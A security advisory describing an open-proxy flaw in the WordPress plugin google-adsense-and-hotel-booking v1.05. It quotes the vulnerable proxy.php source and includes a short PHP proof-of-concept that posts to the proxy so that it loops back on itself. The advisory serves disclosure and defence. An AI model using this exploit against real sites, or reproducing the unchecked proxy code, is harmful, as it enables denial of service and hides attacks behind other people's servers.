Advisory #: 151
Title: Open proxy in Wordpress plugin google-adsense-and-hotel-booking v1.05
Author: Larry W. Cashdollar, @_larry0
Date: 2015-08-15
CVE-ID:[CVE-2015-1000009]
CWE: CWE-284 Improper Access Control
Download Site: https://wordpress.org/plugins/google-adsense-and-hotel-booking/
Vendor: https://profiles.wordpress.org/jelyhost/
Vendor Notified: 2015-08-15
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=151
Description: Automatically insert Google Adsense ads and Hotel Reservations.
Vulnerability:
The code in ./plugin/google-adsense-and-hotel-booking/proxy.php allows an arbitrary user to proxy POST requests though the host site. This may allow attackers to hide attacks, or DoS a site if the POST request is pointed back at itself causing a loop: 3 $url = $_POST['url']; 4 ini_set("allow_url_fopen", 1); 5 $data = array(); 6 while(list($n,$v) = each($_POST)){$data[] = "$n=$v";} 7 $data = implode('&', $data); 8 $url = parse_url($url); 9 $host = $url['host']; 10 $path = $url['path']; 11 $port = 80; 12 $data_length = strlen($data); 13 $header = "POST $path HTTP/1.0\r\n"; 14 $header .= "Host: $host\r\n"; 15 $header .= "User-Agent: DoCoMo/1.0/P503i\r\n"; 16 $header .= "Content-type: application/x-www-form-urlencoded\r\n"; 17 $header .= "Content-length: $data_length\r\n"; 18 $header .= "\r\n"; 19 $fp = fsockopen($host,$port,$err_num,$err_msg,120); 20 $response =''; 21 fputs($fp, $header . $data); 22 while(trim(fgets($fp,4096)) != '');//Retira o cabecalho HTTP 23 while(!feof($fp)){$response .= fgets($fp,4096);} 24 // close the socket connection: 25 fclose($fp); 26 echo $response;
Export: JSON TEXT XML
Exploit Code:
  1. <?php
  2. $target_url = 'http://www.example.com/wp-content/plugins/google-adsense-and-hotel-booking/proxy.php';
  3. echo "POST to $target_url";
  4. $post = array('url' => $target_url,'url'=>$target_url);
  5.  
  6. $ch = curl_init();
  7. curl_setopt($ch, CURLOPT_URL,$target_url);
  8. curl_setopt($ch, CURLOPT_POST,1);
  9. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  10. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  11. $result=curl_exec ($ch);
  12. curl_close ($ch);
  13. echo "#####################################";
  14. echo $result;
  15. echo "#####################################";
  16. ?>
  17.  
Screen Shots:
Notes: